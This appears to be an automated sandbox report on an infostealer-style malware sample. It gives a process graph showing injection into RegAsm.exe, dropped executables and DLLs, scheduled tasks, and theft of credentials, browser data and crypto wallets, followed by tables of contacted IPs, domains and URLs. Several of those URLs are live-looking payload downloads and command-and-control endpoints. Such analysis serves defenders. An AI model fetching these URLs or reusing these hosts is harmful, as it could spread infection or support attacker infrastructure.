xNc0eiwaHinah8TaPUA3TuXZ.exe 2 22->39         started        41 8 other processes 22->41 file10 signatures11 process12 dnsIp13 147 Multi AV Scanner detection for dropped file 33->147 149 Writes to foreign memory regions 33->149 151 Allocates memory in foreign processes 33->151 44 RegAsm.exe 33->44         started        49 conhost.exe 33->49         started        127 185.215.113.100 WHOLESALECONNECTIONSNL Portugal 36->127 153 Detected unpacking (changes PE section rights) 36->153 155 Tries to detect sandboxes and other dynamic analysis tools (window names) 36->155 157 Tries to evade debugger and weak emulator (self modifying code) 36->157 167 4 other signatures 36->167 159 Injects a PE file into a foreign processes 39->159 51 RegAsm.exe 39->51         started        53 conhost.exe 39->53         started        97 C:\ProgramData\...\etzpikspwykg.exe, PE32+ 41->97 dropped 161 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 41->161 163 Found stalling execution ending in API Sleep call 41->163 165 Contains functionality to inject code into remote processes 41->165 169 6 other signatures 41->169 55 B4LiZFzJ_IAKzmYhwI_ve0Iy.exe 41->55         started        57 RegAsm.exe 41->57         started        59 cmd.exe 41->59         started        61 10 other processes 41->61 file14 signatures15 process16 dnsIp17 135 46.8.231.109 FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics Russian Federation 44->135 101 C:\Users\user\AppData\...\softokn3[1].dll, PE32 44->101 dropped 103 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 44->103 dropped 105 C:\Users\user\AppData\...\mozglue[1].dll, PE32 44->105 dropped 117 13 other files (8 malicious) 44->117 dropped 197 Tries to steal Mail credentials (via file / registry access) 44->197 199 Tries to harvest and steal ftp login credentials 44->199 201 Tries to harvest and steal browser information (history, passwords, etc) 44->201 203 Tries to harvest and steal Bitcoin Wallet information 44->203 63 cmd.exe 44->63         started        65 cmd.exe 44->65         started        137 147.45.47.36 FREE-NET-ASFREEnetEU Russian Federation 51->137 205 Installs new ROOT certificates 51->205 207 Tries to steal Crypto Currency Wallets 51->207 139 77.105.164.24 ICOMF-ASRU Russian Federation 55->139 107 C:\Users\user\AppData\...\PowerExpertNNT.exe, PE32 55->107 dropped 109 C:\Users\user\AppData\...xtreamFanV6.exe, PE32 55->109 dropped 111 C:\ProgramData\jewkkwnf\jewkkwnf.exe, PE32 55->111 dropped 67 schtasks.exe 55->67         started        69 schtasks.exe 55->69         started        141 147.45.68.138 FREE-NET-ASFREEnetEU Russian Federation 57->141 113 C:\Users\user\AppData\...\Legitimate.pif, PE32 59->113 dropped 209 Drops PE files with a suspicious file extension 59->209 71 conhost.exe 59->71         started        143 condedqpwqm.shop 172.67.146.35 CLOUDFLARENETUS United States 61->143 145 stamppreewntnq.shop 188.114.97.3 CLOUDFLARENETUS European Union 61->145 115 C:\Users\user\AppData\...\RegAsm.exe.log, ASCII 61->115 dropped 73 conhost.exe 61->73         started        75 conhost.exe 61->75         started        77 conhost.exe 61->77         started        79 conhost.exe 61->79         started        file18 signatures19 process20 process21 81 conhost.exe 63->81         started        83 conhost.exe 65->83         started        85 conhost.exe 67->85         started        87 conhost.exe 69->87         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
46.8.231.109
 unknown Russian Federation
28917 FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics true
185.215.113.100
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
34.117.59.81
 ipinfo.io United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
176.111.174.109
 unknown Russian Federation
201305 WILWAWPL false
147.45.44.104
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU false
158.69.225.124
 youtransfer.net Canada
16276 OVHFR false
104.26.2.46
 iplogger.org United States
13335 CLOUDFLARENETUS false
31.41.244.9
 unknown Russian Federation
61974 AEROEXPRESS-ASRU false
62.133.61.172
 unknown Russian Federation
48430 FIRSTDC-ASRU true
147.45.68.138
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
104.237.62.213
 api64.ipify.org United States
18450 WEBNXUS false
154.216.17.178
 unknown Seychelles
135357 SKHT-ASShenzhenKatherineHengTechnologyInformationCo false
188.114.97.3
 stamppreewntnq.shop European Union
13335 CLOUDFLARENETUS true
172.67.146.35
 condedqpwqm.shop United States
13335 CLOUDFLARENETUS true
76.76.21.98
 file-link-iota.vercel.app United States
16509 AMAZON-02US false
147.45.47.36
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
77.105.164.24
 unknown Russian Federation
43176 ICOMF-ASRU true

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
youtransfer.net 158.69.225.124 true
ipinfo.io 34.117.59.81 true
file-link-iota.vercel.app 76.76.21.98 true
iplogger.org 104.26.2.46 true
stamppreewntnq.shop 188.114.97.3 true
condedqpwqm.shop 172.67.146.35 true
api64.ipify.org 104.237.62.213 true
240902180529931.tyr.zont16.com unknown unknown
locatedblsoqp.shop unknown unknown
traineiwnqo.shop unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://147.45.68.138/nss3.dll true
    http://46.8.231.109/c4754d4f680ead72.php true
      http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll true
        147.45.47.36:30035 true
          http://147.45.44.104/revada/66c6fcb30b9dd_123p.exe false
            https://t.me/edm0d true
              http://147.45.44.104/yuop/66d72df86b9f3_crypted.exe#1 false
                http://147.45.44.104/prog/66d7077a2064d_l.exe false
                  http://147.45.44.104/prog/66d70775c548d_v.exe#space false
                    http://147.45.44.104/yuop/66d60cd3ce002_SeparatelyDied.exe#sun false
                      http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll true
                        http://147.45.68.138/vcruntime140.dll true
                          https://iplogger.org/1nhuM4.js false
                            https://youtransfer.net/handler/download?action=download&download_id=uuVCUDm6&private_id=cb726802f5fcca567315ff7c87e27582&url=https%253A%252F%252Fyoutransfer.net%252FuuVCUDm6%252Fcb726802f5fcca567315ff7c87e27582 false
                              https://steamcommunity.com/profiles/76561199768374681 true
                                http://147.45.68.138/mozglue.dll true
                                  http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll true
                                    locatedblsoqp.shop true
                                      https://file-link-iota.vercel.app/download false
                                        caffegclasiqwp.shop true
                                          millyscroqwp.shop true
                                            http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll true
                                              http://147.45.68.138/freebl3.dll true
                                                traineiwnqo.shop true